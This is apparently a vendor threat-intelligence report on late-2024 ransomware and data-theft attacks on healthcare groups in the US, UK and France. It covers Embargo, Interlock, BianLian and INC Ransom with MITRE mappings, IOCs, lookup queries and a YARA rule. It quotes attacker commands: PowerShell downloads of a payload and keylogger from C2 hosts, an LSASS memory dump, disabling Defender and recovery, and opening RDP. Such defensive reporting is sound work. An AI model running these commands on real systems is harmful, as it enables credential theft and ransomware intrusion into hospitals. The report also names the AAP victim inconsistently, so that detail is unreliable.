Healthcare Attacks

This report provides our perspective, based on open-source data, on the methods employed, the objectives of the attacks, and related aspects.

Cyberattack on the American Academy of Pediatrics: Embargo Ransomware Group Targets Sensitive Data.

Target Country:

  • United States

Target companies:

  • American Academy of Pediatrics (AAP)

Actor

  • Name: Embargo
  • Type: RaaS (ransomware as a service)
  • Motivation: Financial gain

In November 2024, the American Associated Pharmacies (AAP), a cooperative representing over 2,000 independent pharmacies across the United States, became the target of a ransomware attack carried out by the Embargo ransomware group. The group claimed responsibility for the attack, stating on their leak site that they had successfully encrypted AAP’s systems and exfiltrated sensitive company data.

Embargo alleged that AAP paid $1.3 million to decrypt their systems but refused to pay an additional $1.3 million demanded to prevent the publication of the stolen documents. The stolen data reportedly includes confidential company information, internal communications, and financial records.

This incident has raised concerns about the security of critical supply chain and healthcare organizations, as AAP plays a vital role in supporting independent pharmacies throughout the United States. The attack highlights the operational risks ransomware poses to healthcare-associated organizations.

There is no information available regarding the specific methods and tools used in this attack.

Embargo Ransom group

The Embargo ransomware group is a newly discovered threat actor first observed in 2024. The group operates under a Ransomware-as-a-Service (RaaS) model, enabling affiliates to conduct attacks using Embargo's tools and infrastructure.

Embargo employs Rust-based ransomware, which provides cross-platform capabilities and makes the malware harder to detect and analyze using traditional security tools. This choice of technology reflects a growing trend among ransomware developers to adopt modern programming languages for greater efficiency and evasion.

The group has demonstrated notable activity in the United States, where the majority of observed attacks have occurred. There is also evidence that Embargo is active in regions such as Canada, England, Australia, Mexico, Brazil, France, Germany, and the United Kingdom.

Embargo uses double extortion tactics, combining file encryption with data exfiltration. On their leak site, Embargo has claimed incidents where victims paid $1.3 million for decryption, only to face additional demands to prevent the publication of stolen data.

Embargo Ransom Note

While Embargo remains a relatively new actor, its advanced techniques and growing activity have drawn attention within the cybersecurity community.

Techniques and Tools

Embargo ransomware employs a range of tactics to compromise systems, disable recovery options, and encrypt sensitive data. These include:

  • Mutex creation: Creates mutexes named IntoTheFloodAgainSameOldTrip or LoadUpOnGunsBringYourFriends to prevent multiple executions. [T1480.002]

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI Lookup: (syncObjectName:"LoadUpOnGunsBringYourFriends" OR syncObjectName:"IntoTheFloodAgainSameOldTrip") AND syncObjectOperation:"Create"

  • Custom toolkits: Embargo develops and utilizes a custom toolkit, including tools such as MDeployer, MS4Killer, and the Embargo ransomware payload. [T1587]
  • Disabling Windows recovery: Executes BCDEDIT.EXE to disable automatic Windows recovery using the command:
    "C:\Windows\System32\cmd.exe" /q /c bcdedit /set {default} recoveryenabled no. [T1490]

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI lookup: commandLine:"BCDEDIT /SET {DEFAULT} RECOVERYENABLED NO"

  • File encryption: Encrypts files on compromised machines to lock victims out of their systems. Encrypted files are assigned random six-letter extensions consisting of hexadecimal characters, such as .b58eeb, .3d828a, or .564ba1. [T1486]

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI lookup: (filePath:"*.564ba1" or filePath:"*.3d828a" or filePath:"*.b58eeb") And threatName:"embargo"

  • Process termination: Captures snapshots of active processes using CreateToolhelp32Snapshot() and iterates through them with Process32First() and Process32Next(). If targeted processes are identified, they are terminated to facilitate encryption. [T1489]
  • Ransom note deployment: Drops a ransom note named HOW_TO_RECOVER_FILES.txt in each encrypted directory.

The group utilizes specialized tools, including:

  • MDeployer: A malicious loader used to decrypt and execute two payloads: MS4Killer and Embargo ransomware. It reboots systems into Safe Mode to bypass security defenses and facilitates ransomware execution. After encryption, it deletes payloads, removes driver files, and reboots the system. [T1490], [T1070.004]
  • MS4Killer: A defense evasion tool that uses the Bring Your Own Vulnerable Driver (BYOVD) technique to terminate security processes at the kernel level. It runs in an endless loop, scanning for and killing predefined processes to disable security tooling. [T1068]

Embargo Ransom sample

  • SHA-256: 98cc01dcd4c36c47fc13e4853777ca170c734613564a5a764e4d2541a6924d39
  • Sample: ANY.RUN (Note: There is no information confirming that this specific sample was used in the mentioned attack.)

Embargo Ransom Group IOC

IOCs (Click to expand)
  • SHA-256: 98cc01dcd4c36c47fc13e4853777ca170c734613564a5a764e4d2541a6924d39
  • SHA-256: ebffc9ced2dba66db9aae02c7ccd2759a36c5167df5cd4adb151b20e7eab173c
  • SHA-256: 7bfb789f5825f17a01cccd2fbd62635ce20f6ed7e488fded20549a806371aeb6
  • SHA-256: e6b6503217b0cf50e262a6a843624068f8f6a96441d241695893e6cab3c60a2c
  • SHA-1: A1B98B1FBF69AF79E5A3F27AA6256417488CC117
  • SHA-1: F0A25529B0D0AABCE9D72BA46AAF1C78C5B48C31
  • SHA-1: 2BA9BF8DD320990119F42F6F68846D8FB14194D6
  • SHA-1: 888F27DD2269119CF9524474A6A0B559D0D201A1
  • SHA-1: BA14C43031411240A0836BEDF8C8692B54698E05
  • SHA-1: 8A85C1399A0E404C8285A723C4214942A45BBFF9
  • SHA-1: 612EC1D41B2AA2518363B18381FD89C12315100F
  • SHA-1: 7310D6399683BA3EB2F695A2071E0E45891D743B

Yara Embargo detection by Cyble

rule Embargo{ 

meta: 
     author = "Cyble Research and Intelligence Labs" 
     description = "Detects Embargo Ransomware" 
     date = "2024-05-24" 
     os = "Windows" 
strings: 
     $a1  = "LoadUpOnGunsBringYourFriends" fullword ascii wide 
     $a2  = "embargo" nocase ascii wide 
     $a3  = "files01" nocase ascii wide 
condition: 
     all of them 
} 

INTERLOCK targeting organizations in the Healthcare sector.

Target Country:

  • United States

Tagret Companies:

  • Texas Tech University Health Sciences Center
  • Legacy Treatment Services
  • Drug and Alcohol Treatment Service

Actor

  • Name: Interlock
  • Type: Ransomware group
  • Motivation: Financial gain

The Interlock ransomware group first appeared in public reporting in September 2024. Interlock has targeted organizations across a wide range of sectors. According to disclosures on their data leak site, the group's current focus includes healthcare, technology, and government entities in the United States, as well as manufacturing companies in Europe. This pattern suggests their targeting is largely opportunistic, exploiting vulnerabilities across critical industries.

Reports from open sources, such as Moxfive and Infosecurity Magazine, indicate attacks attributed to Interlock. Notable victims listed on their leak site include Texas Tech University Health Sciences Center, Legacy Treatment Services, and Drug and Alcohol Treatment Service.

Leak site

Killchain, Techniques and Tools

The Cisco Talos Incident Response report highlights the discovery of an Interlock ransomware operator. According to the report, the attackers employ the following tactics to deploy and execute Interlock ransomware.

The infection begins when the victim downloads a fake Chrome update installer. This file executes a PowerShell command to download an additional payload: [T1059.001]

powershell.exe -Command Invoke-WebRequest -Uri "hxxps[:]//apple-online.shop/ChromeSetup.exe" -OutFile "$env:TMP/ChromeSetup.exe"

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI lookup: commandLine:"powershell.exe -Command*Invoke-WebRequest -Uri*apple-online.shop*-OutFile*"

To establish persistence, the malware creates a shortcut file named fahhs.lnk and places it in the Windows Startup folder, ensuring the RAT runs each time the victim logs into the system. [T1547.009]

The RAT collects system information encrypts the collected system data in memory and establishes a secure connection with its command-and-control (C2) server apple-online[.]shop, where the encrypted information is sent.

cmd.exe /c systeminfo "Using this command, the RAT collects information about the victim's machine." [T1082]

The attacker downloads a keylogger from a remote server using the following command:

Invoke-WebRequest -Uri "23[.]95.182.59/31279geuwtoisgdehbiuowaehsgdb/klg" -OutFile "$env:TMP/klg"

The file is decrypted using a predefined password and executed with:

Decrypt-File -inputFile "$env:TMP/klg" -outputFile "$env:TMP/klg.dll" -password "jgSkhg934@kjv#1vkfg2S"

rundll32 "$env:TMP/klg.dll" start [T1218.011]

For reconnaissance, the attacker runs PowerShell commands to gather information about domain computers and user accounts, including pre-Kerberoasting reconnaissance: [T1087.002]

powershell.exe -Command ('AD_Computers: {0}' -f ([adsiSearcher]'(ObjectClass=computer)').FindAll().count)

powershell.exe -Command ([adsisearcher]'(&(objectCategory=user)(servicePrincipalName=*))').FindAll()

To move laterally, the attacker uses Remote Desktop Protocol (RDP) with the command: [T1021.001]

mstsc /v 10.*.*.*

.\conhost.exe -d \10.*.*.*\e$

The ransomware deploys the conhost.exe binary, masquerading as a legitimate file. It stores the binary in a folder with a single-digit name (e.g., 3 or 4) inside the user's temporary application data folder. Upon execution, it encrypts files, appending the .interlock extension, and drops a ransom note named !__README__!.txt into every directory containing encrypted files.[T1486]

To maintain persistence, a scheduled task named TaskSystem is created to run the ransomware daily at 8:00 PM as the SYSTEM user:

schtasks /create /sc DAILY /tn "TaskSystem" /tr "cmd /c cd \"$Path of the Interlock binary\" && \"$command\"" /st 20:00 /ru system > nul [T1053.005]

The ransomware is also capable of self-deletion after encryption by using an embedded DLL file named tmp41.wasd, which is dropped into the user's temporary folder. [T1070.004]

Interlock Ransom Group IOC

IOCs (Click to expand)
  • ip: 23[.]95[.]182[.]59
  • ip: 195[.]201[.]21[.]34
  • ip: 159[.]223[.]46[.]184
  • URL: hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/cht
  • URL: hxxp[:]//23[.]95[.]182[.]59/31279geuwtoisgdehbiuowaehsgdb/klg
  • URL: hxxps[:]//apple-online[.]shop/ChromeSetup[.]exe
  • URL: hxxps[:]//rvthereyet[.]com/wp-admin/images/rsggj[.]php
  • SHA-256: a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642
  • SHA-256: c9920e995fbc98cd3883ef4c4520300d5e82bab5d2a5c781e9e9fe694a43e82f
  • SHA-256: e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1

Interlock Ransom sample

  • SHA-256: a26f0a2da63a838161a7d335aaa5e4b314a232acc15dcabdb6f6dbec63cda642
  • Sample: ANY.RUN

Cyberattack on Boston Children’s Health Physicians

Target Country:

  • United States

Target Companies:

  • Boston Children’s Health Physicians (BCHP)

Actor

  • Name: BianLian
  • Type: Ransomware Group
  • Motivation: Financial gain

On September 6, 2024, Boston Children’s Health Physicians (BCHP) confirmed that they had detected unusual activity within their systems. By September 10, BCHP took systems offline after identifying unauthorized access to their network.

The BianLian ransomware group later claimed responsibility for the attack, alleging on their leak site that they had exfiltrated sensitive data, including patient records, financial documents, and internal communications. BCHP acknowledged the incident in an official statement, stating that they are working with cybersecurity experts and law enforcement to investigate the breach and restore operations.

BianLian has become increasingly active, shifting to a data extortion model, where they threaten to publish stolen data rather than encrypt systems. The group uses their dark web leak site to pressure victims into complying with their demands.

boston_children_health.png

Further details about the specific tools, methods, or initial access vector used in this attack have not been disclosed.

BianLian ransom group

The BianLian ransomware group was first observed in 2022 and remains an active cyber threat actor in 2024. Initially, the group employed double extortion tactics but shifted in 2023 to a strategy focused solely on data theft and extortion.

BianLian utilizes tools written in the Go programming language, including a custom backdoor for persistent access and further attacks. They also leverage legitimate system utilities (Living off the Land) to navigate networks and evade detection.

The group actively targets various industries, with the highest concentration of victims in legal services and healthcare. BianLian demonstrates high adaptability and continues to pose a significant threat to organizations worldwide.

Techniques and Tools

BianLian ransomware employs a range of tactics to compromise systems, gain persistence, and exfiltrate sensitive data. These include:

  • Leveraging compromised Remote Desktop Protocol (RDP) credentials, often acquired from initial access brokers. [T1078] [T1133]
  • Using phishing campaigns to trick users into providing access. [T1566]
  • Exploiting vulnerabilities in public-facing applications, including the ProxyShell exploit chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207). [T1190]
  • Implanting custom backdoors written in Go, specific to each victim. [T1587.001]
  • Exploiting CVE-2022-37969 on Windows 10/11 systems to escalate privileges. [T1068]
  • Exploiting CVE-2020-1472 (Netlogon vulnerability) to connect to a domain controller. [T1068]
  • Disabling antivirus tools (e.g., Windows Defender, AMSI) via PowerShell and Command Shell. [T1059.001] [T1059.003] [T1562.001]

dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart

  • Modifying the Windows Registry. [T1112]

reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal * Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

  • Using native Windows tools and the Windows Command Shell to search for sensitive information. [T1552.001]

findstr /spin "password" *.* >C:\Users\training\Music\<file>.txt

  • Using PowerShell to list running processes, installed software, and local drives. [T1082]
  • Encrypting files with .bianlian extensions and dropping ransom notes in each affected directory prior to 2024. [T1486]
  • Exfiltrating data using file transfer tools. [T1537]
  • Attempting to access AD domain databases (e.g., NTDS.dit) and LSASS memory for credential harvesting. [T1003.003] [T1003.001]

cmd.exe /Q /c for /f “tokens=1,2 delims= “ ^%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””’) do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\<file>.csv full

  • Using valid accounts for lateral movement and modifying firewall rules to allow RDP traffic. [T1021.001] [T1562.004]

netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in * protocol=TCP localport=<port num> action=allow

netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=Yes

With the following TI lookup query, we can search through public tasks and identify this malicious activity.

TI lookup: commandLine:"advfirewall firewall add rule*enable=Yes"

  • Сreating a Scheduled Task running with SYSTEM privileges to execute a Dynamic Link Library (DLL) file daily, maintaining persistence on compromised systems. [T1053.005]

schtasks.exe /RU SYSTEM /create /sc ONCE /<user> /tr "cmd.exe /c rundll32.exe c:\programdata\netsh.dll,Entry" /ST 04:43

The group utilizes specialized tools, including:

  • SessionGopher: Used to extract session information for remote access tools (RATs). [T1552.004]
  • PsExec: Facilitates lateral movement by executing commands on remote systems. [T1021.001]
  • Rclone and Mega: For syncing and exfiltrating files to cloud storage. [T1537] [T1567.002]
  • PingCastle: Enumerates Active Directory (AD) environments to identify misconfigurations and vulnerabilities. [T1482]
  • SharpShares: Enumerates accessible network shares within a domain. [T1482]
  • Ngrok and Rsocks: Reverse proxy tools used to mask the origin of C2 traffic and establish secure tunnels. [T1090] [T1090.002]

BianLian Ransom sample

  • SHA-256: 1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43
  • Sample: ANY.RUN (Note: There is no information confirming that this specific sample was used in the mentioned attack.)

BianLian Ransom Group IOC

IOCs (Click to expand)
  • SHA-256: 7b15f570a23a5c5ce8ff942da60834a9d0549ea3ea9f34f900a09331325df893

  • SHA-256: 1fd07b8d1728e416f897bef4f1471126f9b18ef108eb952f4b75050da22e8e43

  • SHA-256: 0c1eb11de3a533689267ba075e49d93d55308525c04d6aff0d2c54d1f52f5500

  • SHA-256: 40126ae71b857dd22db39611c25d3d5dd0e60316b72830e930fba9baf23973ce

  • SHA-256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb

  • SHA-256: af46356eb70f0fbb0799f8a8d5c0f7513d2f6ade4f16d4869f2690029b511d4f

  • SHA-256: 1fd42d07b4be99e0e503c0ed5af2274312be1b03e01b54a6d89c0eef04257d6e

  • SHA-256: 3a2f6e614ff030804aa18cb03fcc3bc357f6226786efb4a734cbe2a3a1984b6f

  • SHA-256: 46d340eaf6b78207e24b6011422f1a5b4a566e493d72365c6a1cace11c36b28b

  • SHA-256: eaf5e26c5e73f3db82cd07ea45e4d244ccb3ec3397ab5263a1a74add7bbcb6e2

  • SHA-256: c775e6d87a3bcc5e94cd055fee859bdb6350af033114fe8588d2d4d4f6d2a3ae

  • SHA-256: c57ca631b069745027d0b4f4d717821ca9bd095e28de2eafe4723eeaf4b062cf

  • SHA-256: c592194cea0acf3d3e181d2ba3108f0f86d74bcd8e49457981423f5f902d054b

  • SHA-256: df51b7b031ecc7c7fa899e17cce98b005576a20a199be670569d5e408d21048c

  • SHA-256: 2ed448721f4e92c7970972f029290ee6269689c840a922982ac2f39c9a6a838f

  • SHA-256: 264af7e7aa17422eb4299df640c1aa199b4778509697b6b296efa5ae7e957b40

  • SHA-256: 73d095abf2f31358c8b1fb0d5a0dc9807e88d44282c896b5033c1b270d44111f

  • SHA-256: 8b65c9437445e9bcb8164d8557ecb9e3585c8bebf37099a3ec1437884efbdd24

  • SHA-256: 4ca84be5b6ab91694a0f81350cefe8379efcad692872a383671ce4209295edc7

  • SHA-256: 93fb7f0c2cf10fb5885e03c737ee8508816c1102e9e3d358160b78e91fa1ebdb

  • SHA-256: afb7f11da27439a2e223e6b651f96eb16a7e35b34918e501886d25439015bf78

  • SHA-256: 53095e2ad802072e97dbb8a7ccea03a36d1536fce921c80a7a2f160c83366999

  • SHA-256: 16cbfd155fb44c6fd0f9375376f62a90ac09f8b7689c1afb5b9b4d3e76e28bdf

  • SHA-256: 60b1394f3afee27701e2008f46d766ef466caa7711c45ddfd443a71efc39a407

  • SHA-256: ba3c4bc99b67038b42b75a206d7ef04f6d8abaf87a76c373d4dec85e73859ce2

  • SHA-256: e7e097723d00f58eab785baf30365c1495e99aa6ead6fe1b86109558838d294e

  • SHA-256: 96e02ea8b1c508f1ee3c1535547f9b89396f557011e61478644ae5876cdaaca5

  • SHA-256: ac1d42360c45e0e908d07e784ceb15faf8987e4ba1744d56313de6524d2687f7

  • SHA-256: 1cba58f73221b5bb7930bfeab0106ae5415e70f49a595727022dcf6fda1126e9

  • SHA-256: 487f0d748a13570a46b20b6687eb7b7fc70a1a55e676fb5ff2599096a1ca888c

  • SHA-256: f84edc07b23423f2c2cad47c0600133cab3cf2bd6072ad45649d6faf3b70ec30

  • SHA-256: 93953eef3fe8405d563560dc332135bfe5874ddeb373d714862f72ee62bef518

  • SHA-256: f3f3c692f728b9c8fd2e1c090b60223ac6c6e88bf186c98ed9842408b78b9f3c

  • SHA-256: f6669de3baa1bca649afa55a14e30279026e59a033522877b70b74bfc000e276

  • SHA-256: 228ef7e0a080de70652e3e0d1eab44f92f6280494c6ba98455111053701d3759

  • SHA-256: 0e4246409cdad59e57c159c7cc4d75319edf7d197bc010174c76fe1257c3a68e

  • SHA-256: 90f50d723bf38a267f5196e22ba22584a1c84d719b501237f43d10117d972843

  • SHA-256: 4c008ac5c07d1573a98eb87bffe64e9c9e946de63b40df3f686881cf0698eef7

  • SHA-256: d3574cc69a5974a32a041d1dc460861fe1cef3c1f063171c5fc890ca0e8403c4

  • SHA-256: 99fc3e13f3b4d8debf1f2328f56f3810480ee2eed9271ebf413c0015c0a54c23

  • SHA-256: 4f4a2adc7ecc41f12defe864c78ad6bbf708355affac4115dcd5065b38198109

  • SHA-256: 188e95d6ed0810c216ab0043ecc2f54f514e624ca31ed1eec58cfc18cc9ac75e

  • SHA-256: 16b0f643670d1f94663179815bfac493f5f30a61d15c18c8b305b1016eece7ef

  • SHA-256: c5fa6a7a3b48a2a4bbcbbbb1ca50c730f3545e3fbb03fa17fb814ad7a400a21f

  • SHA-256: d3fc56b98af9748f7b6dd44e389d343781ff47db9ed3d92ae8fadc837f25f6ed

  • SHA-256: 23295c518f194dee7815728de15bafe07bf53b52d987c7ad2b2050f833f770f7

  • SHA-256: 06f10c935fae531e070c55bde15ee3b48b6bb289af237e96eec82124c19d1049

  • SHA-256: 7ba40902dc495d8da28d0c0788bcfb1449818342df89f005af8ce09f2ee01798

  • SHA-256: 3106e313f6df73b84acd8d848b467ac42c469ffabbad19e4fdcc963639cfff8c

  • SHA-256: 56e63edb832fdf08d19ecfe2de1c7c6c6581cedd431215ded0c8e44ac9aed925

  • SHA-256: 195c11ee41f5a80d8e1b1881245545d6529671b926eb67bd3186e3ffecefe362

  • SHA-256: ac14946fd31ca586368c774f3a3eed1620bf0f0b4f54544f5d25e87facf18d82

  • SHA-256: 29a14cb63a1900fe185fad1c1b2f2efb85a058ac3c185948b758f3ce4107e11e

  • SHA-256: 91ffe0ee445b82bd3360156feeecf8112d27c9333f9796caffcfda986fd7e9b4

  • SHA-256: 5162fd73cbe8f313d2b0e4180bab4cbe47185f73a3ffc3d1dcccc36bc2865142

  • SHA-256: 7dabe5d40c13c7c342b7182eaf7c63fbb5e326300316f6f6518b527d57e79ac8

  • SHA-256: 4e92b73a17e0646876fb9be09c4ee6f015f00273932d2422b69339e22b78b385

  • SHA-256: 9413ba4a33ea77326b837ba538f92348e1909d5263ca67a86aa327daa8fbba30

  • SHA-256: bd41ac2686beadc1cb008433960317b648caae37c93d8c0d61ad40fe27b5b67e

  • SHA-256: bd57af28c94c3b7f156511c48f4b62cd1b4c29a1a693f4dc831e0a928691cc56

  • SHA-256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb

  • ip: 208.123.119[.]123

  • ip: 13.215.228[.]73

  • ip: 54.193.91[.]232

  • ip: 172.96.137[.]159

  • ip: 204.152.203[.]90

  • ip: 144.208.127[.]119

  • ip: 192.161.48[.]43

  • ip: 146.70.87[.]197

  • ip: 45.86.230[.]64

  • ip: 45.56.165[.]17

  • ip: 23.163.0[.]168

  • ip: 172.96.137[.]249

  • ip: 173.254.204[.]78

  • ip: 185.56.137[.]117

  • ip: 52.87.206[.]242

  • ip: 45.66.249[.]118

  • ip: 96.44.157[.]203

  • ip: 103.20.235[.]122

  • ip: 44.212.9[.]14

  • ip: 149.154.158[.]154

  • ip: 146.59.102[.]74

  • ip: 96.44.135[.]76

  • ip: 85.239.52[.]96

  • ip: 66.85.156[.]83

  • ip: 198.252.98[.]186

  • ip: 3.236.161[.]7

  • ip: 13.59.168[.]154

  • ip: 172.245.128[.]35

  • ip: 216.146.25[.]60

  • ip: 172.86.122[.]183

  • ip: 185.99.133[.]112

  • ip: 149.154.158[.]214

  • ip: 104.200.72[.]6

  • ip: 23.163.0[.]228

Cyberattack on Alder Hey Children's NHS Foundation Trust.

Target Country:

  • United Kingdom

Target Companies:

  • Alder Hey Children's NHS Foundation Trust
  • Liverpool Heart and Chest Hospital NHS Foundation Trust
  • Royal Liverpool University Hospital

Actor

  • Name: INC Ransom
  • Type: RaaS (ransomware as a service)
  • Motivation: Financial gain

In November 2024, the Alder Hey Children's NHS Foundation Trust, a major children's hospital in Liverpool, UK, became the target of a ransomware attack. The INC Ransom group claimed responsibility, alleging that they had stolen sensitive data, including patient records, donor reports, and procurement details from 2018 to 2024.

The attack also affected the Liverpool Heart and Chest Hospital NHS Foundation Trust and the Royal Liverpool University Hospital due to shared digital infrastructure. Screenshots of the stolen data, including sensitive patient information and internal documents, were published online and shared across social media, raising concerns about the privacy and security of healthcare systems.

Alder Hey Children INC

The INC Ransom group frequently targets healthcare organizations, demonstrating a consistent focus on this critical sector. Examples of past victims include NHS Scotland, Behavioral Health Response in the United States, and Continuing Healthcare Solutions in the United States. These attacks often result in significant disruptions, exposing patient records and operational data.

There is no information available regarding the specific methods and tools used in this attack.

INC Ransom group

The INC Ransom group emerged in mid-2023 as a key player in the ransomware ecosystem, operating under a Ransomware-as-a-Service (RaaS) model. This structure allows various affiliates to carry out attacks using INC Ransom's tools and infrastructure, making their activities more difficult to trace back to the core group.

INC Ransom has primarily targeted organizations across the United States and countries in Europe. Their attacks frequently focus on sectors such as healthcare, education, and industrial enterprises, where sensitive data and critical infrastructure make victims more likely to comply with ransom demands.

Techniques and Tools

INC Ransom employs a range of tactics to compromise systems and extract sensitive data. These include:

  • Phishing campaigns that exploit human error to gain initial access. [T1566]
  • Exploitation of known vulnerabilities, such as CVE-2023-3519 in Citrix NetScaler, to penetrate networks. [T1190]
  • Data encryption to lock victims out of their systems, often rendering critical operations inoperative. Encrypted files are renamed with the extension .INC, for example, document.docx becomes document.docx.inc. [T1486]
  • They use a combination of wmic.exe and PSExec (disguised as winupd) [Т1027]
  • INC Ransom often leverages compromised credentials to access systems via RDP. During these sessions, they perform enumeration activities, such as scanning for domain administrators and testing network connections. [Т1078] [Т1068]
  • The group utilizes 7-Zip to collect data and examines file content using built-in tools like Wordpad, Notepad, and MSPaint to verify the relevance of documents and images. [Т1074]
  • They also install MEGASync on servers, presumably to facilitate the exfiltration of stolen data. [Т1105]
  • Changes the desktop background image to display a ransom note or instructions, further pressuring victims to comply. [T1491.002]

The group utilizes specialized tools, including:

  • NETSCAN.EXE for network reconnaissance. [T1046]
  • Advance IP Scanner for identifying active devices and open ports on the network. [T1046]
  • MEGAsyncSetup64.EXE to handle file synchronization and data exfiltration. [Т1105]
  • ESENTUTL.EXE for database operations. [T1105]
  • AnyDesk.exe for maintaining remote control over infected systems. [T1021.001] [Т1105]
  • Mimikatz for credential dumping and extracting sensitive authentication information. [T1003]

INC Ransom sample

  • SHA-256: fcefe50ed02c8d315272a94f860451bfd3d86fa6ffac215e69dfa26a7a5deced
  • Sample: ANY.RUN (Note: There is no information confirming that this specific sample was used in the mentioned attack.)

INC Ransom Group IOC

IOCs (Click to expand)
  • SHA-256: fcefe50ed02c8d315272a94f860451bfd3d86fa6ffac215e69dfa26a7a5deced
  • SHA-256: a0ceb258924ef004fa4efeef4bc0a86012afdb858e855ed14f1bbd31ca2e42f5
  • SHA-256: e2370ef066df692317a5f9d739120e467144cfdcd9a4dd7dd562ebdbf5f0778c
  • SHA-256: 1754c9973bac8260412e5ec34bf5156f5bb157aa797f95ff4fc905439b74357a
  • SHA-256: f96ecd567d9a05a6adb33f07880eebf1d6a8709512302e363377065ca8f98f56
  • SHA-256: 11cfd8e84704194ff9c56780858e9bbb9e82ff1b958149d74c43969d06ea10bd
  • SHA-256: 869d6ae8c0568e40086fd817766a503bfe130c805748e7880704985890aca947
  • SHA-256: 0cb4e7d35eb3f4585c6168988247e30d99ef24d3ef006d91971e3913ef593c42
  • SHA-256: 47873072a0ed065e2f240da3e8b10e7251b9596a82cf0375bfc17f60708b8f74
  • SHA-256: 3c4e8f6a5dc94966483069b68981b0ad77ff9c547e8ec3d74ed207e3f037ece6
  • SHA-256: c41ab33986921c812c51e7a86bd3fd0691f5bba925fae612f1b717afaa2fe0ef
  • SHA-256: 36e3c83e50a19ad1048dab7814f3922631990578aab0790401bc67dbcc90a72e
  • SHA-256: 508a644d552f237615d1504aa1628566fe0e752a5bc0c882fa72b3155c322cef
  • SHA-256: d147b202e98ce73802d7501366a036ea8993c4c06cdfc6921899efdd22d159c6
  • SHA-256: 5e3c44ac77cba228f54304f7f1f9ee4d86099950f230186f11fffaa76c86a5db
  • SHA-256: 463075274e328bd47d8092f4901e67f7fff6c5d972b5ffcf821d3c988797e8e3

Cyberattack at French hospital

Country:

  • France

Companies:

  • Centre Luxembourg
  • Clinique Alleray-Labrouste
  • Clinique Jean d'Arc
  • Clinique Saint-Isabelle
  • Hôpital Privé de Thiais

Actor

  • Name: nears (previously near2tlg)
  • Type: Individual cybercriminal
  • Motivation: Financial gain

In November 2024, a cyberattack targeting several French healthcare institutions resulted in the compromise and sale of sensitive health data belonging to over 750,000 patients. The attack affected multiple facilities, including Centre Luxembourg, Clinique Alleray-Labrouste, Clinique Jean d'Arc, Clinique Saint-Isabelle, and Hôpital Privé de Thiais, all of which rely on MediBoard, a software platform widely used for managing patient medical records and administrative workflows in healthcare institutions. It is an integral part of the digital infrastructure in many hospitals across France.

The individual behind the attack, known by the alias "nears" (previously "near2tlg"), claimed responsibility for the breach. The attacker alleged having access to patient records of over 1,500,000 individuals, although the confirmed data leak involved 750,000 records. Unauthorized access to MediBoard systems was also advertised for sale, increasing the threat of further breaches.

The compromised database was listed for sale on BreachForums, a dark web platform known for trading stolen information. The records reportedly include full names, Social Security numbers, health conditions, appointment histories, and contact details of patients.

French hospital Breach

There is no information available regarding the specific methods and tools used in this attack.

Cyberattack on Wirral University Teaching Hospital NHS Trust

Country:

  • United Kingdom

Companies:

  • Arrowe Park Hospital
  • Clatterbridge Hospital
  • Wirral Women and Children's Hospital

In late November 2024, the Wirral University Teaching Hospital NHS Trust in the UK was hit by a cyberattack that disrupted operations at several major facilities, including Arrowe Park Hospital, Clatterbridge Hospital, and Wirral Women and Children's Hospital.

The attack disabled critical systems, forcing staff to use manual records. Many appointments were canceled, and patients were redirected to other hospitals as the Trust declared a major incident.

By December 4, the Trust announced that key clinical systems were being restored, but some services were still unavailable. Patients were advised to visit only in urgent cases.

No cybercriminal group has claimed responsibility for the attack, and there is no information about how the attack was carried out or how initial access was gained.

There is no information available regarding the specific methods and tools used in this attack.